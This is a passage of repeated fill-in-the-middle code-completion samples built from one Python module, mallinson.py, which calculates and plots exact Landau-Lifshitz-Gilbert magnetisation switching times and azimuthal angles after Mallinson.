plt.plot(ts, pols, '--',
exact_times, pols)
plt.figure()
plt.plot(pols, azis, '--',
pols, exact_azis)
plt.show()
<|fim▁end|> | a = azi % (2*pi)
if a < 0:
a += 2*pi
return a |
<|file_name|>mallinson.py<|end_file_name|><|fim▁begin|>"""Calculate exact solutions for the zero dimensional LLG as given by
[Mallinson2000]
"""
from __future__ import division
from __future__ import absolute_import
from math import sin, cos, tan, log, atan2, acos, pi, sqrt
import scipy as sp
import matplotlib.pyplot as plt
import functools as ft
import simpleode.core.utils as utils
def calculate_switching_time(magnetic_parameters, p_start, p_now):
"""Calculate the time taken to switch from polar angle p_start to p_now
with the magnetic parameters given.
"""
# Should never quite get to pi/2
# if p_now >= pi/2:
# return sp.inf
# Cache some things to simplify the expressions later
H = magnetic_parameters.H(None)
Hk = magnetic_parameters.Hk()
alpha = magnetic_parameters.alpha
gamma = magnetic_parameters.gamma
# Calculate the various parts of the expression
prefactor = ((alpha**2 + 1)/(gamma * alpha)) \
* (1.0 / (H**2 - Hk**2))
a = H * log(tan(p_now/2) / tan(p_start/2))
b = Hk * log((H - Hk*cos(p_start)) /
(H - Hk*cos(p_now)))
c = Hk * log(sin(p_now) / sin(p_start))
# Put everything together
return prefactor * (a + b + c)
def calculate_azimuthal(magnetic_parameters, p_start, p_now):
"""Calculate the azimuthal angle corresponding to switching from
p_start to p_now with the magnetic parameters given.
"""
def azi_into_range(azi):
a = azi % (2*pi)
if a < 0:
a += 2*pi
return a
alpha = magnetic_parameters.alpha
no_range_azi = (-1/alpha) * log(tan(p_now/2) / tan(p_start/2))
return azi_into_range(no_range_azi)
def generate_dynamics(magnetic_parameters,
start_angle=pi/18,
end_angle=17*pi/18,
steps=1000):
<|fim_middle|>
def plot_dynamics(magnetic_parameters,
start_angle=pi/18,
end_angle=17*pi/18,
steps=1000):
"""Plot exact positions given start/finish angles and magnetic
parameters.
"""
sphs, times = generate_dynamics(magnetic_parameters, start_angle,
end_angle, steps)
sphstitle = "Path of m for " + str(magnetic_parameters) \
+ "\n (starting point is marked)."
utils.plot_sph_points(sphs, title=sphstitle)
timestitle = "Polar angle vs time for " + str(magnetic_parameters)
utils.plot_polar_vs_time(sphs, times, title=timestitle)
plt.show()
def calculate_equivalent_dynamics(magnetic_parameters, polars):
"""Given a list of polar angles (and some magnetic parameters)
calculate what the corresponding azimuthal angles and switching times
(from the first angle) should be.
"""
start_angle = polars[0]
f_times = ft.partial(calculate_switching_time, magnetic_parameters,
start_angle)
exact_times = [f_times(p) for p in polars]
f_azi = ft.partial(calculate_azimuthal, magnetic_parameters, start_angle)
exact_azis = [f_azi(p) for p in polars]
return exact_times, exact_azis
def plot_vs_exact(magnetic_parameters, ts, ms):
# Extract lists of the polar coordinates
m_as_sph_points = map(utils.array2sph, ms)
pols = [m.pol for m in m_as_sph_points]
azis = [m.azi for m in m_as_sph_points]
# Calculate the corresponding exact dynamics
exact_times, exact_azis = \
calculate_equivalent_dynamics(magnetic_parameters, pols)
# Plot
plt.figure()
plt.plot(ts, pols, '--',
exact_times, pols)
plt.figure()
plt.plot(pols, azis, '--',
pols, exact_azis)
plt.show()
<|fim▁end|> | """Generate a list of polar angles then return a list of corresponding
m directions (in spherical polar coordinates) and switching times.
"""
mag_params = magnetic_parameters
# Construct a set of solution positions
pols = sp.linspace(start_angle, end_angle, steps)
azis = [calculate_azimuthal(mag_params, start_angle, p) for p in pols]
sphs = [utils.SphPoint(1.0, azi, pol) for azi, pol in zip(azis, pols)]
# Calculate switching times for these positions
times = [calculate_switching_time(mag_params, start_angle, p)
for p in pols]
return (sphs, times) |
<|file_name|>mallinson.py<|end_file_name|><|fim▁begin|>"""Calculate exact solutions for the zero dimensional LLG as given by
[Mallinson2000]
"""
from __future__ import division
from __future__ import absolute_import
from math import sin, cos, tan, log, atan2, acos, pi, sqrt
import scipy as sp
import matplotlib.pyplot as plt
import functools as ft
import simpleode.core.utils as utils
def calculate_switching_time(magnetic_parameters, p_start, p_now):
"""Calculate the time taken to switch from polar angle p_start to p_now
with the magnetic parameters given.
"""
# Should never quite get to pi/2
# if p_now >= pi/2:
# return sp.inf
# Cache some things to simplify the expressions later
H = magnetic_parameters.H(None)
Hk = magnetic_parameters.Hk()
alpha = magnetic_parameters.alpha
gamma = magnetic_parameters.gamma
# Calculate the various parts of the expression
prefactor = ((alpha**2 + 1)/(gamma * alpha)) \
* (1.0 / (H**2 - Hk**2))
a = H * log(tan(p_now/2) / tan(p_start/2))
b = Hk * log((H - Hk*cos(p_start)) /
(H - Hk*cos(p_now)))
c = Hk * log(sin(p_now) / sin(p_start))
# Put everything together
return prefactor * (a + b + c)
def calculate_azimuthal(magnetic_parameters, p_start, p_now):
"""Calculate the azimuthal angle corresponding to switching from
p_start to p_now with the magnetic parameters given.
"""
def azi_into_range(azi):
a = azi % (2*pi)
if a < 0:
a += 2*pi
return a
alpha = magnetic_parameters.alpha
no_range_azi = (-1/alpha) * log(tan(p_now/2) / tan(p_start/2))
return azi_into_range(no_range_azi)
def generate_dynamics(magnetic_parameters,
start_angle=pi/18,
end_angle=17*pi/18,
steps=1000):
"""Generate a list of polar angles then return a list of corresponding
m directions (in spherical polar coordinates) and switching times.
"""
mag_params = magnetic_parameters
# Construct a set of solution positions
pols = sp.linspace(start_angle, end_angle, steps)
azis = [calculate_azimuthal(mag_params, start_angle, p) for p in pols]
sphs = [utils.SphPoint(1.0, azi, pol) for azi, pol in zip(azis, pols)]
# Calculate switching times for these positions
times = [calculate_switching_time(mag_params, start_angle, p)
for p in pols]
return (sphs, times)
def plot_dynamics(magnetic_parameters,
start_angle=pi/18,
end_angle=17*pi/18,
steps=1000):
<|fim_middle|>
def calculate_equivalent_dynamics(magnetic_parameters, polars):
"""Given a list of polar angles (and some magnetic parameters)
calculate what the corresponding azimuthal angles and switching times
(from the first angle) should be.
"""
start_angle = polars[0]
f_times = ft.partial(calculate_switching_time, magnetic_parameters,
start_angle)
exact_times = [f_times(p) for p in polars]
f_azi = ft.partial(calculate_azimuthal, magnetic_parameters, start_angle)
exact_azis = [f_azi(p) for p in polars]
return exact_times, exact_azis
def plot_vs_exact(magnetic_parameters, ts, ms):
# Extract lists of the polar coordinates
m_as_sph_points = map(utils.array2sph, ms)
pols = [m.pol for m in m_as_sph_points]
azis = [m.azi for m in m_as_sph_points]
# Calculate the corresponding exact dynamics
exact_times, exact_azis = \
calculate_equivalent_dynamics(magnetic_parameters, pols)
# Plot
plt.figure()
plt.plot(ts, pols, '--',
exact_times, pols)
plt.figure()
plt.plot(pols, azis, '--',
pols, exact_azis)
plt.show()
<|fim▁end|> | """Plot exact positions given start/finish angles and magnetic
parameters.
"""
sphs, times = generate_dynamics(magnetic_parameters, start_angle,
end_angle, steps)
sphstitle = "Path of m for " + str(magnetic_parameters) \
+ "\n (starting point is marked)."
utils.plot_sph_points(sphs, title=sphstitle)
timestitle = "Polar angle vs time for " + str(magnetic_parameters)
utils.plot_polar_vs_time(sphs, times, title=timestitle)
plt.show() |
<|file_name|>mallinson.py<|end_file_name|><|fim▁begin|>"""Calculate exact solutions for the zero dimensional LLG as given by
[Mallinson2000]
"""
from __future__ import division
from __future__ import absolute_import
from math import sin, cos, tan, log, atan2, acos, pi, sqrt
import scipy as sp
import matplotlib.pyplot as plt
import functools as ft
import simpleode.core.utils as utils
def calculate_switching_time(magnetic_parameters, p_start, p_now):
"""Calculate the time taken to switch from polar angle p_start to p_now
with the magnetic parameters given.
"""
# Should never quite get to pi/2
# if p_now >= pi/2:
# return sp.inf
# Cache some things to simplify the expressions later
H = magnetic_parameters.H(None)
Hk = magnetic_parameters.Hk()
alpha = magnetic_parameters.alpha
gamma = magnetic_parameters.gamma
# Calculate the various parts of the expression
prefactor = ((alpha**2 + 1)/(gamma * alpha)) \
* (1.0 / (H**2 - Hk**2))
a = H * log(tan(p_now/2) / tan(p_start/2))
b = Hk * log((H - Hk*cos(p_start)) /
(H - Hk*cos(p_now)))
c = Hk * log(sin(p_now) / sin(p_start))
# Put everything together
return prefactor * (a + b + c)
def calculate_azimuthal(magnetic_parameters, p_start, p_now):
"""Calculate the azimuthal angle corresponding to switching from
p_start to p_now with the magnetic parameters given.
"""
def azi_into_range(azi):
a = azi % (2*pi)
if a < 0:
a += 2*pi
return a
alpha = magnetic_parameters.alpha
no_range_azi = (-1/alpha) * log(tan(p_now/2) / tan(p_start/2))
return azi_into_range(no_range_azi)
def generate_dynamics(magnetic_parameters,
start_angle=pi/18,
end_angle=17*pi/18,
steps=1000):
"""Generate a list of polar angles then return a list of corresponding
m directions (in spherical polar coordinates) and switching times.
"""
mag_params = magnetic_parameters
# Construct a set of solution positions
pols = sp.linspace(start_angle, end_angle, steps)
azis = [calculate_azimuthal(mag_params, start_angle, p) for p in pols]
sphs = [utils.SphPoint(1.0, azi, pol) for azi, pol in zip(azis, pols)]
# Calculate switching times for these positions
times = [calculate_switching_time(mag_params, start_angle, p)
for p in pols]
return (sphs, times)
def plot_dynamics(magnetic_parameters,
start_angle=pi/18,
end_angle=17*pi/18,
steps=1000):
"""Plot exact positions given start/finish angles and magnetic
parameters.
"""
sphs, times = generate_dynamics(magnetic_parameters, start_angle,
end_angle, steps)
sphstitle = "Path of m for " + str(magnetic_parameters) \
+ "\n (starting point is marked)."
utils.plot_sph_points(sphs, title=sphstitle)
timestitle = "Polar angle vs time for " + str(magnetic_parameters)
utils.plot_polar_vs_time(sphs, times, title=timestitle)
plt.show()
def calculate_equivalent_dynamics(magnetic_parameters, polars):
<|fim_middle|>
def plot_vs_exact(magnetic_parameters, ts, ms):
# Extract lists of the polar coordinates
m_as_sph_points = map(utils.array2sph, ms)
pols = [m.pol for m in m_as_sph_points]
azis = [m.azi for m in m_as_sph_points]
# Calculate the corresponding exact dynamics
exact_times, exact_azis = \
calculate_equivalent_dynamics(magnetic_parameters, pols)
# Plot
plt.figure()
plt.plot(ts, pols, '--',
exact_times, pols)
plt.figure()
plt.plot(pols, azis, '--',
pols, exact_azis)
plt.show()
<|fim▁end|> | """Given a list of polar angles (and some magnetic parameters)
calculate what the corresponding azimuthal angles and switching times
(from the first angle) should be.
"""
start_angle = polars[0]
f_times = ft.partial(calculate_switching_time, magnetic_parameters,
start_angle)
exact_times = [f_times(p) for p in polars]
f_azi = ft.partial(calculate_azimuthal, magnetic_parameters, start_angle)
exact_azis = [f_azi(p) for p in polars]
return exact_times, exact_azis |
<|file_name|>mallinson.py<|end_file_name|><|fim▁begin|>"""Calculate exact solutions for the zero dimensional LLG as given by
[Mallinson2000]
"""
from __future__ import division
from __future__ import absolute_import
from math import sin, cos, tan, log, atan2, acos, pi, sqrt
import scipy as sp
import matplotlib.pyplot as plt
import functools as ft
import simpleode.core.utils as utils
def calculate_switching_time(magnetic_parameters, p_start, p_now):
"""Calculate the time taken to switch from polar angle p_start to p_now
with the magnetic parameters given.
"""
# Should never quite get to pi/2
# if p_now >= pi/2:
# return sp.inf
# Cache some things to simplify the expressions later
H = magnetic_parameters.H(None)
Hk = magnetic_parameters.Hk()
alpha = magnetic_parameters.alpha
gamma = magnetic_parameters.gamma
# Calculate the various parts of the expression
prefactor = ((alpha**2 + 1)/(gamma * alpha)) \
* (1.0 / (H**2 - Hk**2))
a = H * log(tan(p_now/2) / tan(p_start/2))
b = Hk * log((H - Hk*cos(p_start)) /
(H - Hk*cos(p_now)))
c = Hk * log(sin(p_now) / sin(p_start))
# Put everything together
return prefactor * (a + b + c)
def calculate_azimuthal(magnetic_parameters, p_start, p_now):
"""Calculate the azimuthal angle corresponding to switching from
p_start to p_now with the magnetic parameters given.
"""
def azi_into_range(azi):
a = azi % (2*pi)
if a < 0:
a += 2*pi
return a
alpha = magnetic_parameters.alpha
no_range_azi = (-1/alpha) * log(tan(p_now/2) / tan(p_start/2))
return azi_into_range(no_range_azi)
def generate_dynamics(magnetic_parameters,
start_angle=pi/18,
end_angle=17*pi/18,
steps=1000):
"""Generate a list of polar angles then return a list of corresponding
m directions (in spherical polar coordinates) and switching times.
"""
mag_params = magnetic_parameters
# Construct a set of solution positions
pols = sp.linspace(start_angle, end_angle, steps)
azis = [calculate_azimuthal(mag_params, start_angle, p) for p in pols]
sphs = [utils.SphPoint(1.0, azi, pol) for azi, pol in zip(azis, pols)]
# Calculate switching times for these positions
times = [calculate_switching_time(mag_params, start_angle, p)
for p in pols]
return (sphs, times)
def plot_dynamics(magnetic_parameters,
start_angle=pi/18,
end_angle=17*pi/18,
steps=1000):
"""Plot exact positions given start/finish angles and magnetic
parameters.
"""
sphs, times = generate_dynamics(magnetic_parameters, start_angle,
end_angle, steps)
sphstitle = "Path of m for " + str(magnetic_parameters) \
+ "\n (starting point is marked)."
utils.plot_sph_points(sphs, title=sphstitle)
timestitle = "Polar angle vs time for " + str(magnetic_parameters)
utils.plot_polar_vs_time(sphs, times, title=timestitle)
plt.show()
def calculate_equivalent_dynamics(magnetic_parameters, polars):
"""Given a list of polar angles (and some magnetic parameters)
calculate what the corresponding azimuthal angles and switching times
(from the first angle) should be.
"""
start_angle = polars[0]
f_times = ft.partial(calculate_switching_time, magnetic_parameters,
start_angle)
exact_times = [f_times(p) for p in polars]
f_azi = ft.partial(calculate_azimuthal, magnetic_parameters, start_angle)
exact_azis = [f_azi(p) for p in polars]
return exact_times, exact_azis
def plot_vs_exact(magnetic_parameters, ts, ms):
# Extract lists of the polar coordinates
<|fim_middle|>
<|fim▁end|> | m_as_sph_points = map(utils.array2sph, ms)
pols = [m.pol for m in m_as_sph_points]
azis = [m.azi for m in m_as_sph_points]
# Calculate the corresponding exact dynamics
exact_times, exact_azis = \
calculate_equivalent_dynamics(magnetic_parameters, pols)
# Plot
plt.figure()
plt.plot(ts, pols, '--',
exact_times, pols)
plt.figure()
plt.plot(pols, azis, '--',
pols, exact_azis)
plt.show() |
<|file_name|>mallinson.py<|end_file_name|><|fim▁begin|>"""Calculate exact solutions for the zero dimensional LLG as given by
[Mallinson2000]
"""
from __future__ import division
from __future__ import absolute_import
from math import sin, cos, tan, log, atan2, acos, pi, sqrt
import scipy as sp
import matplotlib.pyplot as plt
import functools as ft
import simpleode.core.utils as utils
def calculate_switching_time(magnetic_parameters, p_start, p_now):
"""Calculate the time taken to switch from polar angle p_start to p_now
with the magnetic parameters given.
"""
# Should never quite get to pi/2
# if p_now >= pi/2:
# return sp.inf
# Cache some things to simplify the expressions later
H = magnetic_parameters.H(None)
Hk = magnetic_parameters.Hk()
alpha = magnetic_parameters.alpha
gamma = magnetic_parameters.gamma
# Calculate the various parts of the expression
prefactor = ((alpha**2 + 1)/(gamma * alpha)) \
* (1.0 / (H**2 - Hk**2))
a = H * log(tan(p_now/2) / tan(p_start/2))
b = Hk * log((H - Hk*cos(p_start)) /
(H - Hk*cos(p_now)))
c = Hk * log(sin(p_now) / sin(p_start))
# Put everything together
return prefactor * (a + b + c)
def calculate_azimuthal(magnetic_parameters, p_start, p_now):
"""Calculate the azimuthal angle corresponding to switching from
p_start to p_now with the magnetic parameters given.
"""
def azi_into_range(azi):
a = azi % (2*pi)
if a < 0:
<|fim_middle|>
return a
alpha = magnetic_parameters.alpha
no_range_azi = (-1/alpha) * log(tan(p_now/2) / tan(p_start/2))
return azi_into_range(no_range_azi)
def generate_dynamics(magnetic_parameters,
start_angle=pi/18,
end_angle=17*pi/18,
steps=1000):
"""Generate a list of polar angles then return a list of corresponding
m directions (in spherical polar coordinates) and switching times.
"""
mag_params = magnetic_parameters
# Construct a set of solution positions
pols = sp.linspace(start_angle, end_angle, steps)
azis = [calculate_azimuthal(mag_params, start_angle, p) for p in pols]
sphs = [utils.SphPoint(1.0, azi, pol) for azi, pol in zip(azis, pols)]
# Calculate switching times for these positions
times = [calculate_switching_time(mag_params, start_angle, p)
for p in pols]
return (sphs, times)
def plot_dynamics(magnetic_parameters,
start_angle=pi/18,
end_angle=17*pi/18,
steps=1000):
"""Plot exact positions given start/finish angles and magnetic
parameters.
"""
sphs, times = generate_dynamics(magnetic_parameters, start_angle,
end_angle, steps)
sphstitle = "Path of m for " + str(magnetic_parameters) \
+ "\n (starting point is marked)."
utils.plot_sph_points(sphs, title=sphstitle)
timestitle = "Polar angle vs time for " + str(magnetic_parameters)
utils.plot_polar_vs_time(sphs, times, title=timestitle)
plt.show()
def calculate_equivalent_dynamics(magnetic_parameters, polars):
"""Given a list of polar angles (and some magnetic parameters)
calculate what the corresponding azimuthal angles and switching times
(from the first angle) should be.
"""
start_angle = polars[0]
f_times = ft.partial(calculate_switching_time, magnetic_parameters,
start_angle)
exact_times = [f_times(p) for p in polars]
f_azi = ft.partial(calculate_azimuthal, magnetic_parameters, start_angle)
exact_azis = [f_azi(p) for p in polars]
return exact_times, exact_azis
def plot_vs_exact(magnetic_parameters, ts, ms):
# Extract lists of the polar coordinates
m_as_sph_points = map(utils.array2sph, ms)
pols = [m.pol for m in m_as_sph_points]
azis = [m.azi for m in m_as_sph_points]
# Calculate the corresponding exact dynamics
exact_times, exact_azis = \
calculate_equivalent_dynamics(magnetic_parameters, pols)
# Plot
plt.figure()
plt.plot(ts, pols, '--',
exact_times, pols)
plt.figure()
plt.plot(pols, azis, '--',
pols, exact_azis)
plt.show()
<|fim▁end|> | a += 2*pi |
<|file_name|>mallinson.py<|end_file_name|><|fim▁begin|>"""Calculate exact solutions for the zero dimensional LLG as given by
[Mallinson2000]
"""
from __future__ import division
from __future__ import absolute_import
from math import sin, cos, tan, log, atan2, acos, pi, sqrt
import scipy as sp
import matplotlib.pyplot as plt
import functools as ft
import simpleode.core.utils as utils
def <|fim_middle|>(magnetic_parameters, p_start, p_now):
"""Calculate the time taken to switch from polar angle p_start to p_now
with the magnetic parameters given.
"""
# Should never quite get to pi/2
# if p_now >= pi/2:
# return sp.inf
# Cache some things to simplify the expressions later
H = magnetic_parameters.H(None)
Hk = magnetic_parameters.Hk()
alpha = magnetic_parameters.alpha
gamma = magnetic_parameters.gamma
# Calculate the various parts of the expression
prefactor = ((alpha**2 + 1)/(gamma * alpha)) \
* (1.0 / (H**2 - Hk**2))
a = H * log(tan(p_now/2) / tan(p_start/2))
b = Hk * log((H - Hk*cos(p_start)) /
(H - Hk*cos(p_now)))
c = Hk * log(sin(p_now) / sin(p_start))
# Put everything together
return prefactor * (a + b + c)
def calculate_azimuthal(magnetic_parameters, p_start, p_now):
"""Calculate the azimuthal angle corresponding to switching from
p_start to p_now with the magnetic parameters given.
"""
def azi_into_range(azi):
a = azi % (2*pi)
if a < 0:
a += 2*pi
return a
alpha = magnetic_parameters.alpha
no_range_azi = (-1/alpha) * log(tan(p_now/2) / tan(p_start/2))
return azi_into_range(no_range_azi)
def generate_dynamics(magnetic_parameters,
start_angle=pi/18,
end_angle=17*pi/18,
steps=1000):
"""Generate a list of polar angles then return a list of corresponding
m directions (in spherical polar coordinates) and switching times.
"""
mag_params = magnetic_parameters
# Construct a set of solution positions
pols = sp.linspace(start_angle, end_angle, steps)
azis = [calculate_azimuthal(mag_params, start_angle, p) for p in pols]
sphs = [utils.SphPoint(1.0, azi, pol) for azi, pol in zip(azis, pols)]
# Calculate switching times for these positions
times = [calculate_switching_time(mag_params, start_angle, p)
for p in pols]
return (sphs, times)
def plot_dynamics(magnetic_parameters,
start_angle=pi/18,
end_angle=17*pi/18,
steps=1000):
"""Plot exact positions given start/finish angles and magnetic
parameters.
"""
sphs, times = generate_dynamics(magnetic_parameters, start_angle,
end_angle, steps)
sphstitle = "Path of m for " + str(magnetic_parameters) \
+ "\n (starting point is marked)."
utils.plot_sph_points(sphs, title=sphstitle)
timestitle = "Polar angle vs time for " + str(magnetic_parameters)
utils.plot_polar_vs_time(sphs, times, title=timestitle)
plt.show()
def calculate_equivalent_dynamics(magnetic_parameters, polars):
"""Given a list of polar angles (and some magnetic parameters)
calculate what the corresponding azimuthal angles and switching times
(from the first angle) should be.
"""
start_angle = polars[0]
f_times = ft.partial(calculate_switching_time, magnetic_parameters,
start_angle)
exact_times = [f_times(p) for p in polars]
f_azi = ft.partial(calculate_azimuthal, magnetic_parameters, start_angle)
exact_azis = [f_azi(p) for p in polars]
return exact_times, exact_azis
def plot_vs_exact(magnetic_parameters, ts, ms):
# Extract lists of the polar coordinates
m_as_sph_points = map(utils.array2sph, ms)
pols = [m.pol for m in m_as_sph_points]
azis = [m.azi for m in m_as_sph_points]
# Calculate the corresponding exact dynamics
exact_times, exact_azis = \
calculate_equivalent_dynamics(magnetic_parameters, pols)
# Plot
plt.figure()
plt.plot(ts, pols, '--',
exact_times, pols)
plt.figure()
plt.plot(pols, azis, '--',
pols, exact_azis)
plt.show()
<|fim▁end|> | calculate_switching_time |
<|file_name|>mallinson.py<|end_file_name|><|fim▁begin|>"""Calculate exact solutions for the zero dimensional LLG as given by
[Mallinson2000]
"""
from __future__ import division
from __future__ import absolute_import
from math import sin, cos, tan, log, atan2, acos, pi, sqrt
import scipy as sp
import matplotlib.pyplot as plt
import functools as ft
import simpleode.core.utils as utils
def calculate_switching_time(magnetic_parameters, p_start, p_now):
"""Calculate the time taken to switch from polar angle p_start to p_now
with the magnetic parameters given.
"""
# Should never quite get to pi/2
# if p_now >= pi/2:
# return sp.inf
# Cache some things to simplify the expressions later
H = magnetic_parameters.H(None)
Hk = magnetic_parameters.Hk()
alpha = magnetic_parameters.alpha
gamma = magnetic_parameters.gamma
# Calculate the various parts of the expression
prefactor = ((alpha**2 + 1)/(gamma * alpha)) \
* (1.0 / (H**2 - Hk**2))
a = H * log(tan(p_now/2) / tan(p_start/2))
b = Hk * log((H - Hk*cos(p_start)) /
(H - Hk*cos(p_now)))
c = Hk * log(sin(p_now) / sin(p_start))
# Put everything together
return prefactor * (a + b + c)
def <|fim_middle|>(magnetic_parameters, p_start, p_now):
"""Calculate the azimuthal angle corresponding to switching from
p_start to p_now with the magnetic parameters given.
"""
def azi_into_range(azi):
a = azi % (2*pi)
if a < 0:
a += 2*pi
return a
alpha = magnetic_parameters.alpha
no_range_azi = (-1/alpha) * log(tan(p_now/2) / tan(p_start/2))
return azi_into_range(no_range_azi)
def generate_dynamics(magnetic_parameters,
start_angle=pi/18,
end_angle=17*pi/18,
steps=1000):
"""Generate a list of polar angles then return a list of corresponding
m directions (in spherical polar coordinates) and switching times.
"""
mag_params = magnetic_parameters
# Construct a set of solution positions
pols = sp.linspace(start_angle, end_angle, steps)
azis = [calculate_azimuthal(mag_params, start_angle, p) for p in pols]
sphs = [utils.SphPoint(1.0, azi, pol) for azi, pol in zip(azis, pols)]
# Calculate switching times for these positions
times = [calculate_switching_time(mag_params, start_angle, p)
for p in pols]
return (sphs, times)
def plot_dynamics(magnetic_parameters,
start_angle=pi/18,
end_angle=17*pi/18,
steps=1000):
"""Plot exact positions given start/finish angles and magnetic
parameters.
"""
sphs, times = generate_dynamics(magnetic_parameters, start_angle,
end_angle, steps)
sphstitle = "Path of m for " + str(magnetic_parameters) \
+ "\n (starting point is marked)."
utils.plot_sph_points(sphs, title=sphstitle)
timestitle = "Polar angle vs time for " + str(magnetic_parameters)
utils.plot_polar_vs_time(sphs, times, title=timestitle)
plt.show()
def calculate_equivalent_dynamics(magnetic_parameters, polars):
"""Given a list of polar angles (and some magnetic parameters)
calculate what the corresponding azimuthal angles and switching times
(from the first angle) should be.
"""
start_angle = polars[0]
f_times = ft.partial(calculate_switching_time, magnetic_parameters,
start_angle)
exact_times = [f_times(p) for p in polars]
f_azi = ft.partial(calculate_azimuthal, magnetic_parameters, start_angle)
exact_azis = [f_azi(p) for p in polars]
return exact_times, exact_azis
def plot_vs_exact(magnetic_parameters, ts, ms):
# Extract lists of the polar coordinates
m_as_sph_points = map(utils.array2sph, ms)
pols = [m.pol for m in m_as_sph_points]
azis = [m.azi for m in m_as_sph_points]
# Calculate the corresponding exact dynamics
exact_times, exact_azis = \
calculate_equivalent_dynamics(magnetic_parameters, pols)
# Plot
plt.figure()
plt.plot(ts, pols, '--',
exact_times, pols)
plt.figure()
plt.plot(pols, azis, '--',
pols, exact_azis)
plt.show()
<|fim▁end|> | calculate_azimuthal |
<|file_name|>mallinson.py<|end_file_name|><|fim▁begin|>"""Calculate exact solutions for the zero dimensional LLG as given by
[Mallinson2000]
"""
from __future__ import division
from __future__ import absolute_import
from math import sin, cos, tan, log, atan2, acos, pi, sqrt
import scipy as sp
import matplotlib.pyplot as plt
import functools as ft
import simpleode.core.utils as utils
def calculate_switching_time(magnetic_parameters, p_start, p_now):
"""Calculate the time taken to switch from polar angle p_start to p_now
with the magnetic parameters given.
"""
# Should never quite get to pi/2
# if p_now >= pi/2:
# return sp.inf
# Cache some things to simplify the expressions later
H = magnetic_parameters.H(None)
Hk = magnetic_parameters.Hk()
alpha = magnetic_parameters.alpha
gamma = magnetic_parameters.gamma
# Calculate the various parts of the expression
prefactor = ((alpha**2 + 1)/(gamma * alpha)) \
* (1.0 / (H**2 - Hk**2))
a = H * log(tan(p_now/2) / tan(p_start/2))
b = Hk * log((H - Hk*cos(p_start)) /
(H - Hk*cos(p_now)))
c = Hk * log(sin(p_now) / sin(p_start))
# Put everything together
return prefactor * (a + b + c)
def calculate_azimuthal(magnetic_parameters, p_start, p_now):
"""Calculate the azimuthal angle corresponding to switching from
p_start to p_now with the magnetic parameters given.
"""
def <|fim_middle|>(azi):
a = azi % (2*pi)
if a < 0:
a += 2*pi
return a
alpha = magnetic_parameters.alpha
no_range_azi = (-1/alpha) * log(tan(p_now/2) / tan(p_start/2))
return azi_into_range(no_range_azi)
def generate_dynamics(magnetic_parameters,
start_angle=pi/18,
end_angle=17*pi/18,
steps=1000):
"""Generate a list of polar angles then return a list of corresponding
m directions (in spherical polar coordinates) and switching times.
"""
mag_params = magnetic_parameters
# Construct a set of solution positions
pols = sp.linspace(start_angle, end_angle, steps)
azis = [calculate_azimuthal(mag_params, start_angle, p) for p in pols]
sphs = [utils.SphPoint(1.0, azi, pol) for azi, pol in zip(azis, pols)]
# Calculate switching times for these positions
times = [calculate_switching_time(mag_params, start_angle, p)
for p in pols]
return (sphs, times)
def plot_dynamics(magnetic_parameters,
start_angle=pi/18,
end_angle=17*pi/18,
steps=1000):
"""Plot exact positions given start/finish angles and magnetic
parameters.
"""
sphs, times = generate_dynamics(magnetic_parameters, start_angle,
end_angle, steps)
sphstitle = "Path of m for " + str(magnetic_parameters) \
+ "\n (starting point is marked)."
utils.plot_sph_points(sphs, title=sphstitle)
timestitle = "Polar angle vs time for " + str(magnetic_parameters)
utils.plot_polar_vs_time(sphs, times, title=timestitle)
plt.show()
def calculate_equivalent_dynamics(magnetic_parameters, polars):
"""Given a list of polar angles (and some magnetic parameters)
calculate what the corresponding azimuthal angles and switching times
(from the first angle) should be.
"""
start_angle = polars[0]
f_times = ft.partial(calculate_switching_time, magnetic_parameters,
start_angle)
exact_times = [f_times(p) for p in polars]
f_azi = ft.partial(calculate_azimuthal, magnetic_parameters, start_angle)
exact_azis = [f_azi(p) for p in polars]
return exact_times, exact_azis
def plot_vs_exact(magnetic_parameters, ts, ms):
# Extract lists of the polar coordinates
m_as_sph_points = map(utils.array2sph, ms)
pols = [m.pol for m in m_as_sph_points]
azis = [m.azi for m in m_as_sph_points]
# Calculate the corresponding exact dynamics
exact_times, exact_azis = \
calculate_equivalent_dynamics(magnetic_parameters, pols)
# Plot
plt.figure()
plt.plot(ts, pols, '--',
exact_times, pols)
plt.figure()
plt.plot(pols, azis, '--',
pols, exact_azis)
plt.show()
<|fim▁end|> | azi_into_range |
<|file_name|>mallinson.py<|end_file_name|><|fim▁begin|>"""Calculate exact solutions for the zero dimensional LLG as given by
[Mallinson2000]
"""
from __future__ import division
from __future__ import absolute_import
from math import sin, cos, tan, log, atan2, acos, pi, sqrt
import scipy as sp
import matplotlib.pyplot as plt
import functools as ft
import simpleode.core.utils as utils
def calculate_switching_time(magnetic_parameters, p_start, p_now):
"""Calculate the time taken to switch from polar angle p_start to p_now
with the magnetic parameters given.
"""
# Should never quite get to pi/2
# if p_now >= pi/2:
# return sp.inf
# Cache some things to simplify the expressions later
H = magnetic_parameters.H(None)
Hk = magnetic_parameters.Hk()
alpha = magnetic_parameters.alpha
gamma = magnetic_parameters.gamma
# Calculate the various parts of the expression
prefactor = ((alpha**2 + 1)/(gamma * alpha)) \
* (1.0 / (H**2 - Hk**2))
a = H * log(tan(p_now/2) / tan(p_start/2))
b = Hk * log((H - Hk*cos(p_start)) /
(H - Hk*cos(p_now)))
c = Hk * log(sin(p_now) / sin(p_start))
# Put everything together
return prefactor * (a + b + c)
def calculate_azimuthal(magnetic_parameters, p_start, p_now):
"""Calculate the azimuthal angle corresponding to switching from
p_start to p_now with the magnetic parameters given.
"""
def azi_into_range(azi):
a = azi % (2*pi)
if a < 0:
a += 2*pi
return a
alpha = magnetic_parameters.alpha
no_range_azi = (-1/alpha) * log(tan(p_now/2) / tan(p_start/2))
return azi_into_range(no_range_azi)
def <|fim_middle|>(magnetic_parameters,
start_angle=pi/18,
end_angle=17*pi/18,
steps=1000):
"""Generate a list of polar angles then return a list of corresponding
m directions (in spherical polar coordinates) and switching times.
"""
mag_params = magnetic_parameters
# Construct a set of solution positions
pols = sp.linspace(start_angle, end_angle, steps)
azis = [calculate_azimuthal(mag_params, start_angle, p) for p in pols]
sphs = [utils.SphPoint(1.0, azi, pol) for azi, pol in zip(azis, pols)]
# Calculate switching times for these positions
times = [calculate_switching_time(mag_params, start_angle, p)
for p in pols]
return (sphs, times)
def plot_dynamics(magnetic_parameters,
start_angle=pi/18,
end_angle=17*pi/18,
steps=1000):
"""Plot exact positions given start/finish angles and magnetic
parameters.
"""
sphs, times = generate_dynamics(magnetic_parameters, start_angle,
end_angle, steps)
sphstitle = "Path of m for " + str(magnetic_parameters) \
+ "\n (starting point is marked)."
utils.plot_sph_points(sphs, title=sphstitle)
